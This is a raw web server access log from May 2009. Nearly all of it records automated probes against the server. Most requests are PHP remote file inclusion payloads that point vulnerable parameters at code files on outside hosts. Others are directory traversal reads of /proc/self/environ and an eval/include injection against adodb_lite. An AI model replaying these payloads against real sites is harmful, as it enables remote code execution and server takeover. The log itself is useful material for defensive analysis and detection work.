91.121.210.42 - - [26/May/2009:04:58:32 -0500] "GET /logs/access_log.1239580800/modules/My_eGallery/index.php?basepath=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
77.232.66.198 - - [26/May/2009:04:59:07 -0500] "GET /logs/access_log.1239148800//?custompluginfile[]=http://www.triton-friendlyclub.com/2009/id.txt??? HTTP/1.1" 404 311 "-""Mozilla/5.0"
77.232.66.198 - - [26/May/2009:04:59:07 -0500] "GET //?custompluginfile[]=http://www.triton-friendlyclub.com/2009/id.txt??? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
77.232.66.198 - - [26/May/2009:04:59:09 -0500] "GET /logs//?custompluginfile[]=http://www.triton-friendlyclub.com/2009/id.txt??? HTTP/1.1" 200 190846 "-""Mozilla/5.0"
77.232.66.198 - - [26/May/2009:04:59:16 -0500] "GET /logs/access_log.1239148800//?custompluginfile[]=http://www.wizard.com.br/fx29id.txt??? HTTP/1.1" 404 311 "-""Mozilla/5.0"
77.232.66.198 - - [26/May/2009:04:59:16 -0500] "GET //?custompluginfile[]=http://www.wizard.com.br/fx29id.txt??? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
77.232.66.198 - - [26/May/2009:04:59:17 -0500] "GET /logs//?custompluginfile[]=http://www.wizard.com.br/fx29id.txt??? HTTP/1.1" 200 190846 "-""Mozilla/5.0"
216.120.234.169 - - [26/May/2009:05:04:06 -0500] "GET /errors.php?error=http://ircwar.altervista.org/conf/id.txt? HTTP/1.1" 404 293 "-""Mozilla/5.0"
216.120.234.169 - - [26/May/2009:05:04:06 -0500] "GET /logs/errors.php?error=http://ircwar.altervista.org/conf/id.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
216.120.234.169 - - [26/May/2009:05:04:06 -0500] "GET /logs/access_log.1241308800/errors.php?error=http://ircwar.altervista.org/conf/id.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
74.202.111.66 - - [26/May/2009:05:07:37 -0500] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://poisonx.ucoz.com/braid.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
74.202.111.66 - - [26/May/2009:05:07:37 -0500] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://poisonx.ucoz.com/braid.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
74.202.111.66 - - [26/May/2009:05:07:37 -0500] "GET /logs/access_log.1239753600//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://poisonx.ucoz.com/braid.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
74.202.111.66 - - [26/May/2009:05:07:41 -0500] "GET /logs/access_log.1240099200//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://poisonx.ucoz.com/braid.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
61.250.85.200 - - [26/May/2009:05:09:58 -0500] "GET /logs/access_log.1240012800//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.van-long.de//components/com_joomlapack/.dat/fx29id.txt??? HTTP/1.1" 404 369 "-""Mozilla/5.0"
61.250.85.200 - - [26/May/2009:05:09:58 -0500] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.van-long.de//components/com_joomlapack/.dat/fx29id.txt??? HTTP/1.1" 404 347 "-""Mozilla/5.0"
61.250.85.200 - - [26/May/2009:05:09:58 -0500] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.van-long.de//components/com_joomlapack/.dat/fx29id.txt??? HTTP/1.1" 404 342 "-""Mozilla/5.0"
61.250.85.200 - - [26/May/2009:05:10:06 -0500] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.van-long.de//components/com_joomlapack/.dat/fx29id.txt??? HTTP/1.1" 404 342 "-""Mozilla/5.0"
61.250.85.200 - - [26/May/2009:05:10:06 -0500] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.van-long.de//components/com_joomlapack/.dat/fx29id.txt??? HTTP/1.1" 404 347 "-""Mozilla/5.0"
61.250.85.200 - - [26/May/2009:05:10:06 -0500] "GET /logs/access_log.1240012800//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.van-long.de//components/com_joomlapack/.dat/fx29id.txt??? HTTP/1.1" 404 369 "-""Mozilla/5.0"
61.250.85.200 - - [26/May/2009:05:10:28 -0500] "GET /logs/access_log.1241654400//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.van-long.de//components/com_joomlapack/.dat/fx29id.txt??? HTTP/1.1" 404 369 "-""Mozilla/5.0"
61.250.85.200 - - [26/May/2009:05:10:28 -0500] "GET /logs/access_log.1241654400//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.van-long.de//components/com_joomlapack/.dat/fx29id.txt??? HTTP/1.1" 404 369 "-""Mozilla/5.0"
168.143.19.89 - - [26/May/2009:05:11:57 -0500] "GET /logs/errors.php?error=http://idealbulgarianproperties.com/media/on.txt? HTTP/1.1" 404 298 "-""libwww-perl/5.825"
168.143.19.89 - - [26/May/2009:05:11:58 -0500] "GET /errors.php?error=http://idealbulgarianproperties.com/media/on.txt? HTTP/1.1" 404 293 "-""libwww-perl/5.825"
64.202.102.41 - - [26/May/2009:05:12:21 -0500] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.van-long.de//components/com_joomlapack/.dat/fx29id.txt??? HTTP/1.1" 404 347 "-""Mozilla/5.0"
64.202.102.41 - - [26/May/2009:05:12:21 -0500] "GET /logs/access_log.1240012800//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.van-long.de//components/com_joomlapack/.dat/fx29id.txt??? HTTP/1.1" 404 369 "-""Mozilla/5.0"
64.202.102.41 - - [26/May/2009:05:12:21 -0500] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.van-long.de//components/com_joomlapack/.dat/fx29id.txt??? HTTP/1.1" 404 342 "-""Mozilla/5.0"
66.11.230.36 - - [26/May/2009:05:12:45 -0500] "GET //skin/zero_vote/ask_password.php?dir=http://www.sunggong.tv/shirohige/fxid.txt?? HTTP/1.1" 404 315 "-""Mozilla/5.0"
66.11.230.36 - - [26/May/2009:05:12:50 -0500] "GET /logs/access_log.1239062400//skin/zero_vote/ask_password.php?dir=http://www.sunggong.tv/shirohige/fxid.txt?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
66.11.230.36 - - [26/May/2009:05:12:50 -0500] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.sunggong.tv/shirohige/fxid.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
64.202.102.41 - - [26/May/2009:05:13:00 -0500] "GET /logs/access_log.1241654400//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.van-long.de//components/com_joomlapack/.dat/fx29id.txt??? HTTP/1.1" 404 369 "-""Mozilla/5.0"
216.120.234.169 - - [26/May/2009:05:13:23 -0500] "GET /logs/access_log.1241136000/errors.php?error=http://ircwar.altervista.org/conf/id.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
208.80.195.32 - - [26/May/2009:05:14:36 -0500] "GET / HTTP/1.0" 200 3233 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; SIMBAR Enabled; MyIE2; SIMBAR={64665E02-F5D7-4256-9DAB-FB65903D223B})"
66.11.230.36 - - [26/May/2009:05:17:24 -0500] "GET //skin/zero_vote/ask_password.php?dir=http://www.sunggong.tv/shirohige/fxid.txt?? HTTP/1.1" 404 315 "-""Mozilla/5.0"
66.11.230.36 - - [26/May/2009:05:17:24 -0500] "GET /logs/access_log.1239062400//skin/zero_vote/ask_password.php?dir=http://www.sunggong.tv/shirohige/fxid.txt?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
66.11.230.36 - - [26/May/2009:05:17:24 -0500] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.sunggong.tv/shirohige/fxid.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
193.239.248.148 - - [26/May/2009:05:19:21 -0500] "GET ////?_SERVER%5BDOCUMENT_ROOT%5D=http://www.jspipesanddrums.com/photos/footer.gif?? HTTP/1.1" 200 3247 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
216.119.103.12 - - [26/May/2009:05:19:53 -0500] "GET /logs//include/write.php?dir=http://www.tenniskreis-gt.de//redaxo/include/id.txt??? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
216.119.103.12 - - [26/May/2009:05:19:53 -0500] "GET /logs//include/write.php?dir=http://www.tenniskreis-gt.de//redaxo/include/id.txt??? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
216.119.103.12 - - [26/May/2009:05:19:54 -0500] "GET //include/write.php?dir=http://www.tenniskreis-gt.de//redaxo/include/id.txt??? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
216.119.103.12 - - [26/May/2009:05:19:54 -0500] "GET //include/write.php?dir=http://www.tenniskreis-gt.de//redaxo/include/id.txt??? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
66.11.230.36 - - [26/May/2009:05:20:05 -0500] "GET /logs/access_log.1237680000//skin/zero_vote/ask_password.php?dir=http://www.sunggong.tv/shirohige/fxid.txt?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
65.55.106.189 - - [26/May/2009:05:21:18 -0500] "GET /logs/access_log.1232841600 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
210.240.12.4 - - [26/May/2009:05:21:47 -0500] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.van-long.de//components/com_joomlapack/.dat/fx29id.txt??? HTTP/1.1" 404 342 "-""Mozilla/5.0"
210.240.12.4 - - [26/May/2009:05:21:47 -0500] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.van-long.de//components/com_joomlapack/.dat/fx29id.txt??? HTTP/1.1" 404 347 "-""Mozilla/5.0"
210.240.12.4 - - [26/May/2009:05:21:47 -0500] "GET /logs/access_log.1240012800//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.van-long.de//components/com_joomlapack/.dat/fx29id.txt??? HTTP/1.1" 404 369 "-""Mozilla/5.0"
210.240.12.4 - - [26/May/2009:05:22:36 -0500] "GET /logs/access_log.1241654400//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.van-long.de//components/com_joomlapack/.dat/fx29id.txt??? HTTP/1.1" 404 369 "-""Mozilla/5.0"
38.108.70.51 - - [26/May/2009:05:23:18 -0500] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.bigfishingforum.com/components/id.txt??? HTTP/1.1" 404 340 "-""libwww-perl/5.814"
38.108.70.51 - - [26/May/2009:05:23:18 -0500] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.bigfishingforum.com/components/id.txt??? HTTP/1.1" 404 335 "-""libwww-perl/5.814"
193.239.248.148 - - [26/May/2009:05:23:36 -0500] "GET ////?_SERVER%5BDOCUMENT_ROOT%5D=http://www.jspipesanddrums.com/photos/footer.gif?? HTTP/1.1" 200 3247 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
66.11.230.36 - - [26/May/2009:05:25:50 -0500] "GET /logs//components/errors.php?error=http://www.sunggong.tv/shirohige/fxid.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
66.11.230.36 - - [26/May/2009:05:25:51 -0500] "GET //components/errors.php?error=http://www.sunggong.tv/shirohige/fxid.txt?? HTTP/1.1" 404 305 "-""Mozilla/5.0"
66.11.230.36 - - [26/May/2009:05:25:51 -0500] "GET /logs/access_log.1235865600//components/errors.php?error=http://www.sunggong.tv/shirohige/fxid.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
66.11.230.36 - - [26/May/2009:05:26:18 -0500] "GET //components/errors.php?error=http://www.sunggong.tv/shirohige/fxid.txt?? HTTP/1.1" 404 305 "-""Mozilla/5.0"
66.11.230.36 - - [26/May/2009:05:26:18 -0500] "GET /logs//components/errors.php?error=http://www.sunggong.tv/shirohige/fxid.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
66.11.230.36 - - [26/May/2009:05:26:19 -0500] "GET /logs/access_log.1235865600//components/errors.php?error=http://www.sunggong.tv/shirohige/fxid.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
66.11.230.36 - - [26/May/2009:05:27:02 -0500] "GET /logs/access_log.1237680000//skin/zero_vote/ask_password.php?dir=http://www.sunggong.tv/shirohige/fxid.txt?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
38.108.70.51 - - [26/May/2009:05:27:19 -0500] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.bigfishingforum.com/components/id.txt??? HTTP/1.1" 404 340 "-""libwww-perl/5.814"
38.108.70.51 - - [26/May/2009:05:27:20 -0500] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.bigfishingforum.com/components/id.txt??? HTTP/1.1" 404 335 "-""libwww-perl/5.814"
38.108.70.51 - - [26/May/2009:05:28:16 -0500] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.bigfishingforum.com/components/id.txt??? HTTP/1.1" 404 335 "-""libwww-perl/5.814"
38.108.70.51 - - [26/May/2009:05:28:16 -0500] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.bigfishingforum.com/components/id.txt??? HTTP/1.1" 404 340 "-""libwww-perl/5.814"
65.55.106.206 - - [26/May/2009:05:36:48 -0500] "GET /logs/access_log.1158624000 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
168.143.19.89 - - [26/May/2009:05:37:13 -0500] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://idealbulgarianproperties.com/media/on.txt? HTTP/1.1" 404 347 "-""libwww-perl/5.825"
168.143.19.89 - - [26/May/2009:05:37:13 -0500] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://idealbulgarianproperties.com/media/on.txt? HTTP/1.1" 404 342 "-""libwww-perl/5.825"
118.219.232.137 - - [26/May/2009:05:38:28 -0500] "GET //include/write.php?dir=http://www.sunggong.tv/shirohige/fxid.txt?? HTTP/1.1" 404 301 "-""Mozilla/5.0"
118.219.232.137 - - [26/May/2009:05:38:28 -0500] "GET /logs//include/write.php?dir=http://www.sunggong.tv/shirohige/fxid.txt?? HTTP/1.1" 404 306 "-""Mozilla/5.0"
118.219.232.137 - - [26/May/2009:05:38:28 -0500] "GET /logs/access_log.1236643200//include/write.php?dir=http://www.sunggong.tv/shirohige/fxid.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
216.119.103.12 - - [26/May/2009:05:38:52 -0500] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.tenniskreis-gt.de//redaxo/include/id.txt??? HTTP/1.1" 404 335 "-""libwww-perl/5.805"
216.119.103.12 - - [26/May/2009:05:38:52 -0500] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.tenniskreis-gt.de//redaxo/include/id.txt??? HTTP/1.1" 404 330 "-""libwww-perl/5.805"
216.119.103.12 - - [26/May/2009:05:38:53 -0500] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.tenniskreis-gt.de//redaxo/include/id.txt??? HTTP/1.1" 404 335 "-""libwww-perl/5.805"
216.119.103.12 - - [26/May/2009:05:38:53 -0500] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.tenniskreis-gt.de//redaxo/include/id.txt??? HTTP/1.1" 404 330 "-""libwww-perl/5.805"
212.204.254.82 - - [26/May/2009:05:39:10 -0500] "GET //write.php?dir=http://www.sbe.es/buggsbunny?? HTTP/1.1" 404 293 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b"
212.204.254.82 - - [26/May/2009:05:39:10 -0500] "GET /logs//write.php?dir=http://www.sbe.es/buggsbunny?? HTTP/1.1" 404 298 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b"
212.204.254.82 - - [26/May/2009:05:39:10 -0500] "GET /errors.php?error=http://www.sbe.es/buggsbunny?? HTTP/1.1" 404 293 "-""Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)"
212.204.254.82 - - [26/May/2009:05:39:10 -0500] "GET /logs/errors.php?error=http://www.sbe.es/buggsbunny?? HTTP/1.1" 404 298 "-""Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)"
212.204.254.82 - - [26/May/2009:05:39:10 -0500] "GET //write.php?dir=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 293 "-""XXXXXX"
212.204.254.82 - - [26/May/2009:05:39:10 -0500] "GET /logs//write.php?dir=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 298 "-""XXXXXX"
212.204.254.82 - - [26/May/2009:05:39:10 -0500] "GET //write.php?dir=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""XXXXXX"
212.204.254.82 - - [26/May/2009:05:39:10 -0500] "GET /logs//write.php?dir=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""XXXXXX"
216.151.134.36 - - [26/May/2009:05:45:15 -0500] "GET /logs/access_log.1242000000/?sourcedir=http://www.laxestereo.com/liverequest/req/copyright???? HTTP/1.1" 404 310 "-""Mozilla/5.0"
216.151.134.36 - - [26/May/2009:05:45:15 -0500] "GET /?sourcedir=http://www.laxestereo.com/liverequest/req/copyright???? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
216.151.134.36 - - [26/May/2009:05:45:16 -0500] "GET /logs/?sourcedir=http://www.laxestereo.com/liverequest/req/copyright???? HTTP/1.1" 200 190841 "-""Mozilla/5.0"
216.151.134.36 - - [26/May/2009:05:46:45 -0500] "GET /logs/access_log.1241568000/?sourcedir=http://www.laxestereo.com/liverequest/req/copyright???? HTTP/1.1" 404 310 "-""Mozilla/5.0"
207.44.232.81 - - [26/May/2009:05:47:13 -0500] "GET /?custompluginfile[]=http://www.elvstrom.fr/~citypass/sites/justcars/simple.jpg? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
207.44.232.81 - - [26/May/2009:05:47:14 -0500] "GET /logs/access_log.1239148800/?custompluginfile[]=http://www.elvstrom.fr/~citypass/sites/justcars/simple.jpg? HTTP/1.1" 404 310 "-""Mozilla/5.0"
207.44.232.81 - - [26/May/2009:05:47:14 -0500] "GET /logs/?custompluginfile[]=http://www.elvstrom.fr/~citypass/sites/justcars/simple.jpg? HTTP/1.1" 200 190841 "-""Mozilla/5.0"
66.175.122.228 - - [26/May/2009:05:47:51 -0500] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.sunggong.tv/shirohige/fxid.txt?? HTTP/1.1" 404 341 "-""Mozilla/5.0"
66.175.122.228 - - [26/May/2009:05:47:51 -0500] "GET /logs/access_log.1242000000/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.sunggong.tv/shirohige/fxid.txt?? HTTP/1.1" 404 368 "-""Mozilla/5.0"
66.175.122.228 - - [26/May/2009:05:47:51 -0500] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.sunggong.tv/shirohige/fxid.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
213.246.62.35 - - [26/May/2009:05:47:55 -0500] "GET /logs//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://jamur.3dn.ru/id.txt? HTTP/1.1" 404 330 "-""libwww-perl/5.803"
213.246.62.35 - - [26/May/2009:05:47:55 -0500] "GET //components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://jamur.3dn.ru/id.txt? HTTP/1.1" 404 325 "-""libwww-perl/5.803"
93.187.232.76 - - [26/May/2009:05:48:17 -0500] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.futbolmaniausa.com/components/com_zoom/images/v6-i.txt??? HTTP/1.1" 404 332 "-""libwww-perl/5.808"
93.187.232.76 - - [26/May/2009:05:48:17 -0500] "GET //assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.futbolmaniausa.com/components/com_zoom/images/v6-i.txt??? HTTP/1.1" 404 327 "-""libwww-perl/5.808"
208.116.34.106 - - [26/May/2009:05:50:37 -0500] "GET /logs//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.magicmountainfilms.com/ainul/AinuLid1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
208.116.34.106 - - [26/May/2009:05:50:37 -0500] "GET /logs/access_log.1242432000//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.magicmountainfilms.com/ainul/AinuLid1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
208.116.34.106 - - [26/May/2009:05:50:37 -0500] "GET //index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.magicmountainfilms.com/ainul/AinuLid1.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
207.44.232.81 - - [26/May/2009:05:51:03 -0500] "GET /?custompluginfile[]=http://www.elvstrom.fr/~citypass/sites/justcars/simple.jpg? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
207.44.232.81 - - [26/May/2009:05:51:04 -0500] "GET /logs/access_log.1239148800/?custompluginfile[]=http://www.elvstrom.fr/~citypass/sites/justcars/simple.jpg? HTTP/1.1" 404 310 "-""Mozilla/5.0"
207.44.232.81 - - [26/May/2009:05:51:04 -0500] "GET /logs/?custompluginfile[]=http://www.elvstrom.fr/~citypass/sites/justcars/simple.jpg? HTTP/1.1" 200 190841 "-""Mozilla/5.0"
58.227.193.198 - - [26/May/2009:05:51:55 -0500] "GET /logs/access_log.1242000000/?sourcedir=http://www.laxestereo.com/liverequest/req/copyright???? HTTP/1.1" 404 310 "-""Mozilla/5.0"
58.227.193.198 - - [26/May/2009:05:51:56 -0500] "GET /?sourcedir=http://www.laxestereo.com/liverequest/req/copyright???? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
58.227.193.198 - - [26/May/2009:05:51:57 -0500] "GET /logs/?sourcedir=http://www.laxestereo.com/liverequest/req/copyright???? HTTP/1.1" 200 190841 "-""Mozilla/5.0"
85.186.33.28 - - [26/May/2009:05:52:43 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://ircwar.altervista.org/conf/id.txt? HTTP/1.1" 404 330 "-""Mozilla/5.0"
85.186.33.28 - - [26/May/2009:05:52:43 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://ircwar.altervista.org/conf/id.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
85.186.33.28 - - [26/May/2009:05:52:43 -0500] "GET /logs/access_log.1237680000//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://ircwar.altervista.org/conf/id.txt? HTTP/1.1" 404 357 "-""Mozilla/5.0"
58.227.193.198 - - [26/May/2009:05:53:35 -0500] "GET /logs/access_log.1241568000/?sourcedir=http://www.laxestereo.com/liverequest/req/copyright???? HTTP/1.1" 404 310 "-""Mozilla/5.0"
85.214.83.196 - - [26/May/2009:05:55:52 -0500] "GET /logs/access_log.1235433600//include/admin.lib.inc.php?site_path=http://pacificdecor.org/vnc/fx29id.txt??? HTTP/1.1" 404 336 "-""Mozilla/5.0"
85.214.83.196 - - [26/May/2009:05:55:52 -0500] "GET //include/admin.lib.inc.php?site_path=http://pacificdecor.org/vnc/fx29id.txt??? HTTP/1.1" 404 309 "-""Mozilla/5.0"
85.214.83.196 - - [26/May/2009:05:55:52 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://pacificdecor.org/vnc/fx29id.txt??? HTTP/1.1" 404 314 "-""Mozilla/5.0"
85.214.83.196 - - [26/May/2009:05:56:19 -0500] "GET /logs/access_log.1234224000//include/admin.lib.inc.php?site_path=http://pacificdecor.org/vnc/fx29id.txt??? HTTP/1.1" 404 336 "-""Mozilla/5.0"
66.175.122.228 - - [26/May/2009:05:56:59 -0500] "GET /logs/access_log.1242432000/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.sunggong.tv/shirohige/fxid.txt?? HTTP/1.1" 404 368 "-""Mozilla/5.0"
65.55.106.220 - - [26/May/2009:05:57:18 -0500] "GET /logs/access_log.1232323200 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
64.34.181.87 - - [26/May/2009:05:59:57 -0500] "GET //index.php?page=http://www.maierarchitekten.de/manager/processors/id1.txt? HTTP/1.1" 404 293 "-""Mozilla/5.0"
64.34.181.87 - - [26/May/2009:05:59:57 -0500] "GET /logs//index.php?page=http://www.maierarchitekten.de/manager/processors/id1.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
64.34.181.87 - - [26/May/2009:05:59:57 -0500] "GET /logs/access_log.1238112000//index.php?page=http://www.maierarchitekten.de/manager/processors/id1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
216.120.234.169 - - [26/May/2009:06:02:47 -0500] "GET /logs/access_log.1240790400/phphtml.php?htmlclass_path=http://ircwar.altervista.org/conf/id.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
216.120.234.169 - - [26/May/2009:06:02:47 -0500] "GET /logs/phphtml.php?htmlclass_path=http://ircwar.altervista.org/conf/id.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0"
216.120.234.169 - - [26/May/2009:06:02:47 -0500] "GET /phphtml.php?htmlclass_path=http://ircwar.altervista.org/conf/id.txt? HTTP/1.1" 404 294 "-""Mozilla/5.0"
66.219.99.129 - - [26/May/2009:06:13:12 -0500] "GET /logs/ib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 327 "-""libwww-perl/5.79"
66.219.99.129 - - [26/May/2009:06:13:12 -0500] "GET /ib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 322 "-""libwww-perl/5.79"
66.225.238.20 - - [26/May/2009:06:14:07 -0500] "GET ///admin.php?include_path=http://www.dynamicformation.com//administrator/components/com_virtuemart/classes/export/mawar.txt????? HTTP/1.1" 404 294 "-""Mozilla/5.0"
66.225.238.20 - - [26/May/2009:06:14:08 -0500] "GET /logs///admin.php?include_path=http://www.dynamicformation.com//administrator/components/com_virtuemart/classes/export/mawar.txt????? HTTP/1.1" 404 299 "-""Mozilla/5.0"
66.225.238.20 - - [26/May/2009:06:14:08 -0500] "GET /logs/access_log.1238889600///admin.php?include_path=http://www.dynamicformation.com//administrator/components/com_virtuemart/classes/export/mawar.txt????? HTTP/1.1" 404 321 "-""Mozilla/5.0"
